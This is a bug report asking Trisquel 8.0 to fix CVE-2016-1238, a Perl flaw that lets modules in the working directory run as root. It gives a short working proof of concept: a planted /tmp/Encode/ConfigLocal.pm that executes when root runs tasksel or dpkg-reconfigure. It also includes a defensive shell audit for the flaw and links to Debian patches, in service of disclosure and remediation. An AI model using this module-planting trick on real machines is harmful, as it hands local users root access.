CVE-2016-1238 (local privilege escalation) is easily exploitable but it is not addressed in Trisquel 8.0

Project:Trisquel
Version:8.0
Component:Packages
Category:Report a bug
Priority:critical
Assigned:Unassigned
Status:patch (needs work)
Description

Steps to reproduce:

1. Execute the following command:

mkdir /tmp/Encode; echo "system(q(id)); 1;" > /tmp/Encode/ConfigLocal.pm

2. Change the current working directory to /tmp:

cd /tmp

3. Run dpkg-reconfigure, adduser, deluser or tasksel as root:

sudo tasksel

Expected result:
/tmp/Encode/ConfigLocal.pm should not be executed.

Observed result:
You will see a line containing the output of the "id" command: "uid=0(root) gid=0(root) groups=0(root)".

Trisquel 8.0 and earlier versions are affected; the upcoming Trisquel 9 is not affected.

Canonical has decided to ignore this vulnerability in Ubuntu 16.04, cf.: https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1238.html, https://bugs.launchpad.net/ubuntu/+source/perl/+bug/1705145. This vulnerability has been mitigated in Debian "jessie". I propose that their patches for Perl 5.20 should be ported to Perl 5.22 (this version is in Trisquel 8.0).
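As an added check that is not part of this bug report, the POSIX shell snippet below audits whether a Perl interpreter's compiled-in default @INC still contains the current directory, which is what lets /tmp/Encode/ConfigLocal.pm be picked up in the steps above. The function names inc_has_cwd and audit_perl and the sample @INC listings are constructed for this example.

```shell
#!/bin/sh
# Constructed example: detect the CVE-2016-1238 condition ("." in @INC)
# on an installed perl, so a fixed package can be verified after upgrading.

# inc_has_cwd reads @INC entries, one per line, from stdin and returns 0
# (true) if any entry names the current working directory: ".", "./", or
# an empty entry (perl also treats an empty @INC element as cwd).
inc_has_cwd() {
    while IFS= read -r entry; do
        case "$entry" in
            ""|.|./) return 0 ;;
        esac
    done
    return 1
}

# audit_perl prints whether the given perl binary (default: perl in PATH)
# searches cwd for modules by default. Returns 0 if clean, 1 if affected,
# 2 if the interpreter cannot be run.
audit_perl() {
    perl_path=$(command -v "${1:-perl}") || {
        echo "cannot find perl interpreter: ${1:-perl}" >&2
        return 2
    }
    # env -i clears PERL5LIB, PERL5OPT and PERL_USE_UNSAFE_INC so that only
    # the interpreter's built-in default @INC is examined, not the caller's
    # environment; the full path is needed because PATH is cleared as well.
    if env -i "$perl_path" -e 'print "$_\n" for @INC' | inc_has_cwd; then
        echo "affected: cwd entry present in default @INC of $perl_path"
        return 1
    fi
    echo "ok: no cwd entry in default @INC of $perl_path"
    return 0
}
```

Run `audit_perl` on each perl you ship (for example `audit_perl /usr/bin/perl`) before and after applying the backported patches; it reports "affected" while the interpreter still loads modules from the working directory.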

External links:
https://security-tracker.debian.org/tracker/CVE-2016-1238
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1238
https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1238.html
https://bugs.launchpad.net/ubuntu/+source/perl/+bug/1705145
https://sources.debian.org/src/perl/5.20.2-3+deb8u11/debian/patches/debian/CVE-2016-1238/
https://sources.debian.org/src/perl/5.20.2-3+deb8u11/debian/patches/fixes/CVE-2016-1238/